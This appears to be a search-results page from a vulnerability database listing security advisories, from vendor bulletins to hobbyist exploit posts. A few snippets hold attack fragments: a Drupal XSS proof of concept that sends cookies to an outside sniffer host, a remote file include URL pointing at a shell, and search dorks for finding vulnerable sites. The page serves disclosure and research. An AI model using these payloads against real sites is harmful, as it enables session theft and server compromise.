Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2015/04/09 12:0 a.m.168 views

APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004 OS X Yosemite 10.10.3 and Security Update 2015-004 are now available and address the following: Admin Framework Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A process may gain...

10CVSS0.5AI score0.98685EPSS
Exploits60
securityvulns
securityvulns
added 2015/02/22 12:0 a.m.168 views

Cosmoshop - XSS on Admin-Login Mask

author: l0om page: l0om.org date: 14.02.2015 Cosmoshop is a simple webshop designed for the german market. There is a simple XSS flaw at the admin-login panel in probably all cosmoshop versions. The admin login can be found at http://www.shop-site.de/cgi-bin/cosmoshop/admin/index.cgi This page wi...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2015/01/19 12:0 a.m.168 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

7.5CVSS1.6AI score0.38463EPSS
Exploits19References14Affected Software12
securityvulns
securityvulns
added 2014/05/05 12:0 a.m.168 views

Oracle / Sun / MySQL / PeopleSoft / OpenJDK applications multiple security vulnerabilities

Quarterly update fixes 144 different vulnerabilities...

10CVSS2.2AI score0.59558EPSS
Exploits27References5Affected Software33
securityvulns
securityvulns
added 2012/09/03 12:0 a.m.168 views

TEMENOS T24 R07.03 Reflected Cross-Site Scripting

TEMENOS T24 R07.03 reflected cross-site scripting Class: Input Validation Error Remote: Yes Local: No Published: 26/06/2012 Credit: Raymond Rizk of Dionach Limited [email protected] Vulnerable: TEMENOS T24 R07.03 TEMENOS T24 is prone to a reflected cross-site scripting vulnerability because it...

7AI score
Exploits0
securityvulns
securityvulns
added 2012/07/16 12:0 a.m.168 views

security advisory: AirDroid 1.0.4 beta

Dear Sir or Madam, we'd like to publish the following advisory. Thanks in advance. TC-SA-2012-02: Several weaknesses in implementation of security features in AirDroid 1.0.4 beta Published: 2012/07/12 Advisory-Version: 1.0 Affected products: AirDroid 1.0.4 beta References: TC-SA-2012-02...

7.5CVSS6.5AI score0.01431EPSS
Exploits5
securityvulns
securityvulns
added 2011/08/17 12:0 a.m.168 views

Muzedon (dettaglio.php?id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Muzedon dettaglio.php?id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Persian Gulf 4 Ever! Dork : "Powered By Muzedon.com" "inurl:dettaglio.php?id=" Exploite:...

4.5AI score
Exploits0
securityvulns
securityvulns
added 2011/08/01 12:0 a.m.168 views

Web Fusion Nepal (tour.php?category) XSS Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD XSS Vulnerability Web Fusion Nepal tour.php?category AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://webfusion.com.np/ Persian Gulf 4 Ever! Dork : "Powered by: Web Fusion Nepal" "inurl:tour.php?category="...

2.7AI score
Exploits0
securityvulns
securityvulns
added 2011/07/06 12:0 a.m.168 views

PHP directory traversal

Directory traversal in RFC 1867 files upload...

6.4CVSS2.9AI score0.19235EPSS
Exploits1Affected Software1
securityvulns
securityvulns
added 2007/02/22 12:0 a.m.168 views

Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak

Title: Microsoft Windows 2000/XP/2003/Vista ReadDirectoryChangesW informaton leak Author: 3APA3A, http://securityvulns.com Affected: Microsoft Windows 2000,XP,2003,Vista Exploitable: Yes Type: Remote from local network, authentication required NULL session was not tested. Class: Information leak...

4.6CVSS6AI score0.0361EPSS
Exploits1
securityvulns
securityvulns
added 2006/11/22 12:0 a.m.168 views

PhotoCart 3.9 (adminprint.php) Remote File Include Vulnerability

PhotoCart 3.9 adminprint.php Remote File Include Vulnerability Script site: http://www.picturespro.com/store/programs/129-photocart.html Dork : inurl :/PhotoCart/ Bug Found By : irvian GreetZ: jipank,kacung,trangkil,ibnusina,cah|gemblunkz,zoid Special greetz: patihack hitamputih nyubicrew bug fou...

1AI score
Exploits0
securityvulns
securityvulns
added 2004/09/17 12:0 a.m.168 views

wp-04-0001: Multiple Browser Cookie Injection Vulnerabilities

Westpoint Security Advisory --------------------------- Title: Multiple Browser Cookie Injection Vulnerabilities Risk Rating: Low Software: Multiple Web Browsers Platforms: Unix and Windows Author: Paul Johnston [email protected] assisted by Richard Moore [email protected] Date: 15...

7.5CVSS6.8AI score0.17183EPSS
Exploits1
securityvulns
securityvulns
added 2014/12/01 12:0 a.m.167 views

[CVE-2014-8338] Cross Site Scripting (XSS) vulnerability in videowhisper

Hello, Cross Site Scripting XSS vulnerability exists in videowhisper module for Drupal 7. Vendor Notification: 22, Oct 2014 Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/specialtextscroller.php POC:...

1.9AI score0.01276EPSS
Exploits2
securityvulns
securityvulns
added 2014/05/02 12:0 a.m.167 views

[security bulletin] HPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04268240 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04268240 Version: 1 HPSBMU03029 rev....

5CVSS0.5AI score0.99999EPSS
Exploits88
securityvulns
securityvulns
added 2013/11/26 12:0 a.m.167 views

[SECURITY] [DSA 2797-1] chromium-browser security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2797-1 [email protected] http://www.debian.org/security/ Michael Gilbert November 16, 2013 http://www.debian.org/security/faq -...

10CVSS0.7AI score0.10117EPSS
Exploits4
securityvulns
securityvulns
added 2010/07/15 12:0 a.m.167 views

Cross-Site Scripting vulnerabilities in SimpGB

Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting persistent XSS уязвимостях в SimpGB. Ранее я уже сообщал о других уязвимостях в SimpGB http://securityvulns.ru/news/CGI/2009.11.19.html. XSS: Это Persistent XSS в трёх функционалах веб приложения. POST запрос на страницах:...

5.8AI score
Exploits0
securityvulns
securityvulns
added 2009/06/01 12:0 a.m.167 views

MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades & Attendance v-3.2.6 -->

---------------------------------------------------------------------------------- MULTIPLE SQL INJECTION VULNERABILITIES -- Online Grades & Attendance v-3.2.6 -- ---------------------------------------------------------------------------------- CMS INFORMATION: --WEB: http://www.onlinegrades.org...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2008/01/02 12:0 a.m.167 views

MODx CMS Source code disclosure, local file inclusion

WwW.BugReport.ir AmnPardaz Security Research Team Title: MODx CMS Vulnerabilities Vendor: http://modxcms.com Bugs: Source code disclosure, local file inclusion Vulnerable Version: 0.9.6.1 prior versions also may be affected Exploitation: Remote with browser Fix Available: No! - Description: quote...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2007/04/19 12:0 a.m.167 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

9.3CVSS1.5AI score0.09691EPSS
Exploits4References32Affected Software34
securityvulns
securityvulns
added 2006/09/05 12:0 a.m.167 views

MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit

============================================================================================== MySpeach = v3.0.2 mymsroot Remote File Inclusion Exploit =============================================================================================== Critical Level : Very Dangerous Venedor site :...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2005/10/13 12:0 a.m.167 views

Symantec Veritas NetBackup network backup system buffer overflow

Java User Interface bpjava-msvc daemon TCP/13722 buffer overflow on COMMANDLOGONTOMSERVER request...

4AI score
Exploits0References2Affected Software1
securityvulns
securityvulns
added 2002/03/25 12:0 a.m.167 views

memberlist.php of vBulletin

vBulletin ALL versions Vendor status: notified 3/18/2; no response Within the first few lines of code in memberlist.php, the variable $letterbits is evaled. Because of the way PHP initializes variables, we can inject HTML, or JavaScript into the document. So by directing a user to, for example:...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2001/03/11 12:0 a.m.167 views

MDKSA-2001:028 - slrn update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Linux-Mandrake Security Update Advisory Package name: slrn Date: March 9th, 2001 Advisory ID: MDKSA-2001:028 Affected versions: 6.0, 6.1, 7.0, 7.1, 7.2, Corporate Server 1.0.1 Problem Description: A buffer overflow exists in versions of the slrn news...

Exploits0
securityvulns
securityvulns
added 2014/11/24 12:0 a.m.166 views

[ MDVSA-2014:213 ] curl

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:213 http://www.mandriva.com/en/support/security/ Package : curl Date : November 18, 2014 Affected: Business Server 1.0 Problem Description: Updated curl packages fix security vulnerability: Symeon Paraschoud...

4.3CVSS7.9AI score0.05121EPSS
Exploits0
securityvulns
securityvulns
added 2014/10/16 12:0 a.m.166 views

[KIS-2014-08] OpenCart <= 1.5.6.4 (cart.php) PHP Object Injection Vulnerability

----------------------------------------------------------------- OpenCart = 1.5.6.4 cart.php PHP Object Injection Vulnerability ----------------------------------------------------------------- - Software Link: http://www.opencart.com/ - Affected Versions: Version 1.5.6.4 and prior versions. -...

7.5CVSS0.3AI score0.06865EPSS
Exploits3
securityvulns
securityvulns
added 2014/05/29 12:0 a.m.166 views

[SECURITY] CVE-2014-0075 Apache Tomcat denial of service

CVE-2014-0075 Denial of Service Severity: Important Vendor: The Apache Software Foundation Versions Affected: - Apache Tomcat 8.0.0-RC1 to 8.0.3 - Apache Tomcat 7.0.0 to 7.0.52 - Apache Tomcat 6.0.0 to 6.0.39 Description: It was possible to craft a malformed chunk size as part of a chucked reques...

5CVSS0.6AI score0.2006EPSS
Exploits1
securityvulns
securityvulns
added 2014/04/20 12:0 a.m.166 views

[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04236062 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04236062 Version: 1 HPSBMU02994 rev....

5CVSS0.5AI score0.99999EPSS
Exploits88
securityvulns
securityvulns
added 2013/07/10 12:0 a.m.166 views

Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities

Memory corruption, use-after-free, privilege escalation, information leakage...

10CVSS2.8AI score0.10893EPSS
Exploits6References1Affected Software3
securityvulns
securityvulns
added 2011/08/05 12:0 a.m.166 views

Android Browser Cross-Application Scripting (CVE-2011-2357)

============================================================= Android Browser Cross-Application Scripting CVE-2011-2357 ============================================================= 1 Background -------------- Android applications are executed in a sandbox environment, to ensure that no applicati...

4.3CVSS5.9AI score0.04615EPSS
Exploits3
securityvulns
securityvulns
added 2011/02/22 12:0 a.m.166 views

[SECURITY] [DSA 2166-1] chromium-browser security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2166-1 [email protected] http://www.debian.org/security/ Giuseppe Iuculano February 16, 2011 http://www.debian.org/security/faq -...

10CVSS4.7AI score0.02117EPSS
Exploits5
securityvulns
securityvulns
added 2009/07/03 12:0 a.m.166 views

Artofdefence Hyperguard Web Application Firewall: Remote Denial of Service

Security Advisory --------------------------------------- Vulnerable Software: Artofdefence Hyperguard Web Application Firewall Vulnerable Version: 3 branches: prior to 3.1.1-11637; prior to 3.0.3-11636; prior to 2.5.5-11635 Apache Plug-in Homepage: http://www.artofdefence.com/ Found by: Michael...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2009/03/09 12:0 a.m.166 views

[SECURITY] CVE-2009-0781 XSS in Apache Tomcat examples web application

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2009-0781: Apache Tomcat cross-site scripting vulnerability Severity: low Vendor: The Apache Software Foundation Versions Affected: Tomcat 6.0.0 to 6.0.18 Tomcat 5.5.0 to 5.5.27 Tomcat 4.1.0 to 4.1.39 Description: The calendar application in the...

4.3CVSS0.2AI score0.09125EPSS
Exploits1
securityvulns
securityvulns
added 2009/02/23 12:0 a.m.166 views

Drupal reflected XSS

PoC: HTML TITLEDrupal reflected XSS by etteeitdefence.ru/TITLE!-- Full HTML =on ""scriptimg = new Image; img.src = "http://sniffer/image/s.gif?"+document.cookie;/script --BODY onload="p.submit" form action="http://freelanguage.org/comment/reply/532/1263"!--target-- method="post" id="p" input...

6AI score
Exploits0
securityvulns
securityvulns
added 2006/01/29 12:0 a.m.166 views

PmWiki Multiple Vulnerabilities

This is both a PmWiki and PHP advisory, and works only with registerglobals on. I totally missed the PHP GLOBALS GPC injection vulnerability and rediscovered that by my own if just few month before! arg!. Basically in the worst scenario be are in front of two separate vulnerabilities: one regardi...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2005/05/10 12:0 a.m.166 views

Easy Message Board Directory Traversal and Remote Command

============================================================ ============================================================ Title: Easy Message Board Directory Traversal and Remote Command Execution Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 08/05/2005...

1.9AI score
Exploits0
securityvulns
securityvulns
added 2004/12/21 12:0 a.m.166 views

AIX 5.1/5.2/5.3 local root exploits

hi, i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3 unix for IBM RS/6000 powerpc. 1 the first is a bug in all setuid diag related tools that use an environment variable as a prefix to an external binary executed as root. 2 the second is a classical stack overflow in a too...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2004/06/23 12:0 a.m.166 views

[Full-Disclosure] [waraxe-2004-SA#033 - Multiple security holes in PhpNuke - part 1]

================================================================================ waraxe-2004-SA033 ================================================================================ Multiple security holes in PhpNuke - part 1...

7.9AI score
Exploits0
securityvulns
securityvulns
added 2001/05/25 12:0 a.m.166 views

Elevation of privileges with debug registers on Win2K

Georgi Guninski security advisory 45, 2001 Elevation of privileges with debug registers on Win2K Systems affected: Win2K, Win2K SP1 have not tested on Win2K SP2 but according to Microsoft SP2 fixes this Risk: High Date: 24 May 2001 Legal Notice: This Advisory is Copyright c 2001 Georgi Guninski...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2000/08/25 12:0 a.m.166 views

DST2K0023: Directory Traversal Possible & Denial of Service in Wo rm HTTP Server

============================================================================ Delphis Consulting Plc ============================================================================ Security Team Advisories 25/08/2000 [email protected] http://www.delphisplc.com/thinking/whitepapers/...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2000/06/15 12:0 a.m.166 views

Re: Snort 1.6 and nmap 2.54beta1

From the BUGS file distributed with Snort: ------------------------------------------------------------------------- Bug reports should be sent to [email protected] Please include the following information with your report: System Architecture Sparc, x86, etc Operating System and version Linux...

6.9AI score
Exploits0
securityvulns
securityvulns
added 2015/10/25 12:0 a.m.165 views

Apple iOS multiple security vulnerabilities

Screen unlock, information disclosure, restrictions bypass, multiple memory corruptions, weak encryption, multiple vulnerabilities in different libraries...

10CVSS1.9AI score0.2447EPSS
Exploits8References3Affected Software1
securityvulns
securityvulns
added 2014/05/04 12:0 a.m.165 views

APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3 AirPort Base Station Firmware Update 7.7.3 is now available and addresses the following: Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: An...

5CVSS7.5AI score0.99999EPSS
Exploits88
securityvulns
securityvulns
added 2010/12/21 12:0 a.m.165 views

XSS vulnerability in Habari

Vulnerability ID: HTB22731 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinhabari.html Product: Habari Vendor: Habari http://habariproject.org/en/ Vulnerable Version: 0.6.5 Vendor Notification: 02 December 2010 Vulnerability Type: XSS Cross Site Scripting Status: Fixed by Vendor Risk...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2010/11/24 12:0 a.m.165 views

[SECURITY] CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability Severity: Tomcat 7.0.x - Low, Tomcat 6.0.x - Moderate Vendor: The Apache Software Foundation Versions Affected: - - Tomcat 7.0.0 to 7.0.4 - Not affected in default configuration. -...

4.3CVSS5.8AI score0.42009EPSS
Exploits1
securityvulns
securityvulns
added 2008/01/17 12:0 a.m.165 views

BitTorrent / uTorrent buffer overflow

Buffer overflow on peer information displaying...

2.6AI score
Exploits0References1Affected Software2
securityvulns
securityvulns
added 2007/04/25 12:0 a.m.165 views

HTMLeditbox & 2.2 >> RFI

+++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,dNetGuru bug : editor.php @include$settingsappdir.'/inc/config.php'; exploit : http://victim/editor.php?settingsappdir=http://shell ++++++...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2007/02/28 12:0 a.m.165 views

Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability

Admin Phorum 3.3.1.a del.php includepathFile Include Vulnerability Author: GoldM Hacker at w.Cn Mahmoodali Homepage: Www.Tryag.Cc Download S : http://www.phpforums.net/admin331.zip Other Info : http://www.phpforums.net/index.php?dir=dld v.Code : Line 3 require "$includepath/deletemessage.php";...

1AI score
Exploits0
securityvulns
securityvulns
added 2000/05/26 12:0 a.m.165 views

Security Bulletin (MS00-036)

Microsoft Security Bulletin MS00-036 - -------------------------------------- Patch Available for "ResetBrowser Frame" and "HostAnnouncement Flooding" Vulnerabilities Originally posted: May 25, 2000 Summary ======= Microsoft has released a patch that eliminates two security vulnerabilities, one...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2015/08/24 12:0 a.m.164 views

CVE-2015-3269 Apache Flex BlazeDS Insecure Xml Entity Expansion Vulnerability

CVE-2015-3269 Apache Flex BlazeDS Insecure Xml Entity Expansion Vulnerability Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Flex BlazeDS 4.7.0 Description: When receiving XML encoded AMF messages containing DTD entities, the default XML parser configurations...

5CVSS0.8AI score0.0954EPSS
Exploits2
securityvulns
securityvulns
added 2015/06/08 12:0 a.m.164 views

[SECURITY] [DSA 3280-1] php5 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3280-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff June 07, 2015 http://www.debian.org/security/faq -...

7.5CVSS2.4AI score0.50129EPSS
Exploits6
Total number of security vulnerabilities5000